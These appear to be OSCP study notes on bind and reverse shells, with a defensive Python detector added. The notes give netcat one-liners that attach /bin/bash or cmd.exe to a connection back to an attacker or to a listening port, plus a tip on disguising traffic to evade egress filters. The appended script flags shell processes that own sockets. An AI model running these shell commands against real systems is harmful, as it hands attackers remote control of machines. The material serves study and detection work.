OSCP Notes
Bind and Reverse shell


Last updated 3 years ago

  • Reverse shells can be initiated using many different programming and scripting languages, including PHP, ASP, Python, Perl and PowerShell. If you have managed to get code execution on a compromised host, or you can inject code, upload or include files in a web application, this can often be turned into a command-line shell with just a little work, no matter what the platform or application language. For receiving the shell on the attack box, we can use several different tools such as Netcat, Metasploit and Empire.

  • A bind shell is, like the reverse shell, also set up on the target host, but instead of connecting back to a listening host, it binds to a specific port and waits for incoming connections. In malicious software terms, a bind shell is what is referred to as a ‘backdoor’.

Reverse shell

One advantage of reverse shells is that they have the highest success rate when there are firewalls and NAT devices between the attacker and the victim. For instance, when the target host connects to the internet through a NAT device, an attacker won’t be able to connect to the target host directly without first configuring the target’s networking equipment. In this situation bind shells won’t work, but it may still be possible to establish a connection using a reverse shell. Another advantage of reverse shells is that outgoing connections are normally not as heavily filtered by a firewall as incoming connections. Even so, you should keep in mind that egress rules may apply, and suspicious connections (such as connections on port 4444) may still get flagged and blocked, preventing the reverse shell from reaching you. If you can disguise your traffic to look like legitimate traffic, your chances of success increase and your reverse shell is less likely to be blocked.

Attacker

nc -lvp 4444
# listen for incoming connections

Target

nc <ip> 4444 -e /bin/bash
# Linux target

nc <ip> 4444 -e cmd.exe
# Windows target

Bind shell

As explained earlier in this chapter a bind shell is a shell that binds to a specific port on the target host to listen for incoming connections. In this case the attack box connects to the target host on a specific port (rather than the target sending the shell back to the attack box as in a reverse shell).

Target

nc -lvp 4444 -e /bin/bash
# listen on the target and attach /bin/bash to the incoming connection

Attacker

nc <target_ip> 4444
# connect from the attack box to the listening target

IMP: When working with bind shells it is important to realize their limitations. First of all, the attacker must have a route to the target. If the target is behind a NAT device, the bind shell will open a port on the local network that is inaccessible to the attacker. Another important factor is that bind shells can only bind to an open and unused port. Thus, if there’s a web server running on ports 80 and 443 and you try to bind a shell to one of these ports to make your traffic look legitimate, you will fail. Lastly, it is very common for unusual ports to be blocked by firewalls. Most firewalls are configured to allow access only for specific traffic to known services. If a firewall blocks traffic to the port your bind shell listens on, you may be able to open the port on the target host, but you won’t be able to connect to it. In this sort of scenario, a reverse shell has more chance of success.
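Seen from the host side, both shapes described on this page leave the same trace: a shell process that owns a network socket, either listening (bind) or established to a peer (reverse), plus the odd-port egress the text says firewalls tend to flag. The following is an added, defender-side example and is not part of the original notes: it walks a constructed `ss -tnap`-style socket table and reports rows matching those patterns. The process names, the sample rows and the port list other than 4444 are assumptions.

```python
from dataclasses import dataclass

# Constructed sample rows in an `ss -tnap`-like layout (state, local, peer, process);
# these are made-up values, not output captured from a real host.
SAMPLE = """\
LISTEN  0.0.0.0:22        0.0.0.0:*          sshd
ESTAB   10.0.0.5:51234    203.0.113.9:4444   bash
LISTEN  0.0.0.0:4444      0.0.0.0:*          bash
ESTAB   10.0.0.5:51240    203.0.113.9:443    firefox
ESTAB   10.0.0.5:51241    203.0.113.9:4444   curl
LISTEN  0.0.0.0:80        0.0.0.0:*          nginx
"""

# Programs that should not normally own a network socket themselves. With `nc -e`,
# the spawned shell inherits the socket descriptors, so it can appear as an owner.
SHELL_PROCS = {"bash", "sh", "dash", "zsh", "cmd.exe", "powershell.exe"}
# Port 4444 is the one the text singles out; the other two are assumed examples.
SUSPICIOUS_PORTS = {4444, 1337, 31337}


@dataclass(frozen=True)
class Finding:
    kind: str      # "shell-listener", "shell-socket" or "suspicious-port"
    process: str
    local: str
    peer: str


def port_of(addr: str):
    """Return the numeric port of 'host:port', or None for a wildcard peer like '0.0.0.0:*'."""
    _host, _, port = addr.rpartition(":")
    return int(port) if port.isdigit() else None


def classify(table: str):
    """Walk socket rows and return a Finding for each row matching a shell pattern."""
    findings = []
    for line in table.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue                      # skip headers / malformed rows
        state, local, peer, proc = parts[:4]
        if proc in SHELL_PROCS and state == "LISTEN":
            findings.append(Finding("shell-listener", proc, local, peer))   # bind shell shape
        elif proc in SHELL_PROCS and state == "ESTAB":
            findings.append(Finding("shell-socket", proc, local, peer))     # shell on a live socket
        elif state == "ESTAB" and port_of(peer) in SUSPICIOUS_PORTS:
            findings.append(Finding("suspicious-port", proc, local, peer))  # egress-rule style hit
    return findings


if __name__ == "__main__":
    for f in classify(SAMPLE):
        print(f"{f.kind:16} {f.process:10} {f.local} -> {f.peer}")
```

The process-name check is a heuristic: a legitimate script that opens sockets from bash will also be reported, so treat the output as triage input rather than a verdict.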